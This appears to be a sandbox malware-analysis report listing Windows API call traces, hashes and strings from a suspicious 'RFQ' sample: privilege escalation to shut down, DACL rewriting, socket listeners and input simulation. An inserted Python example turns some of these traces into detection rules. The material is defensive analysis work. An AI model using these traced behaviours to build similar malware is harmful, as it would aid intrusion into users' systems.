                                                        • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                        • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                        • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                        • FindClose.KERNEL32(00000000), ref: 0044291C
                                                        • FindClose.KERNEL32(00000000), ref: 00442930
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                        • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                        • FindClose.KERNEL32(00000000), ref: 004429D4
                                                          • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                        • FindClose.KERNEL32(00000000), ref: 004429E2
                                                        Strings
                                                        Similarity
                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                        • String ID: *.*
                                                        • API String ID: 2640511053-438819550
                                                        • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                        • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                        • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                        • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                        • GetLastError.KERNEL32 ref: 00433414
                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                        • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                        • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                        Strings
                                                        Similarity
                                                        • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                        • String ID: SeShutdownPrivilege
                                                        • API String ID: 2938487562-3733053543
                                                        • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                        • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                        • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                        • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                        APIs
                                                          • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                          • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                          • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                          • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                        • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                        • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                        • CopySid.ADVAPI32(00000000), ref: 00446271
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                        Similarity
                                                        • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                        • String ID:
                                                        • API String ID: 1255039815-0
                                                        • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                        • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                        • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                        • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                        APIs
                                                        • __swprintf.LIBCMT ref: 00433073
                                                        • __swprintf.LIBCMT ref: 00433085
                                                        • __wcsicoll.LIBCMT ref: 00433092
                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                        • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                        • LockResource.KERNEL32(00000000), ref: 004330CA
                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                        • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                        • LockResource.KERNEL32(?), ref: 00433120
                                                        Similarity
                                                        • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                        • String ID:
                                                        • API String ID: 1158019794-0
                                                        • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                        • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                        • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                        • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                        APIs
                                                        Similarity
                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                        • String ID:
                                                        • API String ID: 1737998785-0
                                                        • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                        • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                        • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                        • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                        • GetLastError.KERNEL32 ref: 0045D6BF
                                                        • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                        Strings
                                                        Similarity
                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                        • API String ID: 4194297153-14809454
                                                        • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                        • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                        • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                        • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: _memmove$_strncmp
                                                        • String ID: @oH$\$^$h
                                                        • API String ID: 2175499884-3701065813
                                                        • Opcode ID: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                        • Instruction ID: d0725f23cfd3ca281eac06f76a82abe5967bc3f30214560d9089fed7748fa16d
                                                        • Opcode Fuzzy Hash: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                        • Instruction Fuzzy Hash: C642E270E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD855AB351D7399946CF55
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                        • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                        • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                        Similarity
                                                        • API ID: ErrorLast$closesocket$bindlistensocket
                                                        • String ID:
                                                        • API String ID: 540024437-0
                                                        • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                        • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                        • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                        • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
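Three of the per-function API tables above carry a security meaning in the order of the calls rather than in any single call: the SeShutdownPrivilege entry (OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, then ExitWindowsEx / InitiateSystemShutdownExW / SetSystemPowerState), the user-object security entry (GetUserObjectSecurity, GetSecurityDescriptorDacl, two AddAce calls, SetSecurityDescriptorDacl, SetUserObjectSecurity with 00000004), and the WSOCK32 entry (socket with 2,1,6, then bind and listen). The following Python is an added example written for this page, not Joe Sandbox code: it parses listing lines in exactly the bullet format used in these tables and runs ordered-sequence rules over them. The sample input is copied verbatim from the two entries above; the rule names, and the readings of the constants (0x28 as TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, 4 as DACL_SECURITY_INFORMATION, 2/1/6 as AF_INET/SOCK_STREAM/IPPROTO_TCP, and the DACL rewrite as granting a SID access to a window station or desktop) are this example's interpretation of the arguments, not fields of the report.

```python
import re
from typing import NamedTuple, Optional

class Call(NamedTuple):
    api: str
    module: str
    args: tuple      # argument tokens exactly as printed, e.g. '00000028' or '?'
    ref: str         # call-site address from 'ref:'
    subcall: bool    # line marked 'Part of subcall function'

# Accepts the three line shapes used in the 'APIs' tables on this page:
#   • ExitWindowsEx.USER32(?,00000000), ref: 00433437
#   • GetLastError.KERNEL32 ref: 00433414
#   • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(...), ref: 00436E45
_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

def parse_listing(text: str) -> list:
    """Turn one 'APIs' table into Call records, skipping lines that do not parse."""
    calls = []
    for m in filter(None, map(_LINE.match, text.splitlines())):
        args = () if m["args"] is None else tuple(a.strip() for a in m["args"].split(","))
        calls.append(Call(m["api"], m["mod"], args, m["ref"], m["sub"] is not None))
    return calls

# A rule is an ordered list of steps (acceptable API names, optional predicate on the
# Call). Steps must occur in listing order; unrelated calls may sit between them.
RULES = {
    # Token gains SeShutdownPrivilege, then a reboot/shutdown/suspend API is reached.
    "shutdown_privilege_then_power_change": [
        ({"OpenProcessToken"}, None),
        ({"LookupPrivilegeValueW", "LookupPrivilegeValueA"}, lambda c: "SeShutdownPrivilege" in c.args),
        ({"AdjustTokenPrivileges"}, None),
        ({"ExitWindowsEx", "InitiateSystemShutdownExW", "SetSystemPowerState"}, None),
    ],
    # DACL of a USER object (window station or desktop) is read, extended with ACEs and
    # written back with DACL_SECURITY_INFORMATION (4). Reading (this example's, not the
    # report's): a SID is granted access to the interactive station, the usual prelude
    # to starting a process under another token.
    "user_object_dacl_rewrite": [
        ({"GetUserObjectSecurity"}, None),
        ({"GetSecurityDescriptorDacl"}, None),
        ({"AddAce"}, None),
        ({"SetSecurityDescriptorDacl"}, None),
        ({"SetUserObjectSecurity"}, lambda c: len(c.args) > 1 and c.args[1] == "00000004"),
    ],
    # socket(AF_INET=2, SOCK_STREAM=1, IPPROTO_TCP=6) followed by bind and listen.
    "tcp_listener": [
        ({"socket"}, lambda c: c.args[:3] == ("00000002", "00000001", "00000006")),
        ({"bind"}, None),
        ({"listen"}, None),
    ],
}

def match_rule(calls: list, steps: list) -> Optional[list]:
    """In-order subsequence match; returns the matched call-site refs or None."""
    refs, i = [], 0
    for apis, pred in steps:
        while i < len(calls) and not (calls[i].api in apis and (pred is None or pred(calls[i]))):
            i += 1
        if i == len(calls):
            return None
        refs.append(calls[i].ref)
        i += 1
    return refs

def scan(listing: str) -> dict:
    """Map each rule that fires on the listing to the refs it matched."""
    calls = parse_listing(listing)
    return {name: refs for name, steps in RULES.items()
            if (refs := match_rule(calls, steps)) is not None}

# Sample input: the 'APIs' tables of two entries on this page, copied verbatim.
SHUTDOWN_LISTING = """
• GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
• OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
• GetLastError.KERNEL32 ref: 00433414
• ExitWindowsEx.USER32(?,00000000), ref: 00433437
• InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
• SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
"""
DACL_LISTING = """
  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
• GetLengthSid.ADVAPI32(?), ref: 004461D0
• GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
• GetLengthSid.ADVAPI32(?), ref: 00446241
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
• CopySid.ADVAPI32(00000000), ref: 00446271
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
"""

if __name__ == "__main__":
    for name, text in (("shutdown", SHUTDOWN_LISTING), ("dacl", DACL_LISTING)):
        print(name, scan(text))
```

Two caveats when using argument predicates on these tables. The sandbox prints the stack slots it observed at the call, so a value can be attributed to the wrong call: the 00000028 shown under GetCurrentProcess, which takes no arguments, is in this reading the DesiredAccess of the OpenProcessToken that follows. And the match is a greedy in-order subsequence, so it tolerates the GetLastError and GetLengthSid calls between steps; it does not prove the calls are on one control-flow path, only that they appear in that order in the same function.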
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                        • API String ID: 0-2872873767
                                                        • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                        • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                        • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                        • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                        • __wsplitpath.LIBCMT ref: 00475644
                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                        • _wcscat.LIBCMT ref: 00475657
                                                        • __wcsicoll.LIBCMT ref: 0047567B
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                        • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                        • String ID:
                                                        • API String ID: 2547909840-0
                                                        • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                        • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                        • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                        • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                        APIs
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                        • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                        • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                        • FindClose.KERNEL32(?), ref: 004525FF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                        • String ID: *.*$\VH
                                                        • API String ID: 2786137511-2657498754
                                                        • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                        • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                        • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                        • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                        • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                        • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                        • String ID: pqI
                                                        • API String ID: 2579439406-2459173057
                                                        • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                        • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                        • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                        • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                        APIs
                                                        • __wcsicoll.LIBCMT ref: 00433349
                                                        • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                        • __wcsicoll.LIBCMT ref: 00433375
                                                        • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __wcsicollmouse_event
                                                        • String ID: DOWN
                                                        • API String ID: 1033544147-711622031
                                                        • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                        • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                        • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                        • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                        • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                        • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                        • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                        • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: KeyboardMessagePostState$InputSend
                                                        • String ID:
                                                        • API String ID: 3031425849-0
                                                        • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                        • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                        • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                        • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                        APIs
                                                          • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                        • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 4170576061-0
                                                        • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                        • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                        • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                        • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                        APIs
                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                        • IsWindowVisible.USER32 ref: 0047A368
                                                        • IsWindowEnabled.USER32 ref: 0047A378
                                                        • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                        • IsIconic.USER32 ref: 0047A393
                                                        • IsZoomed.USER32 ref: 0047A3A1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
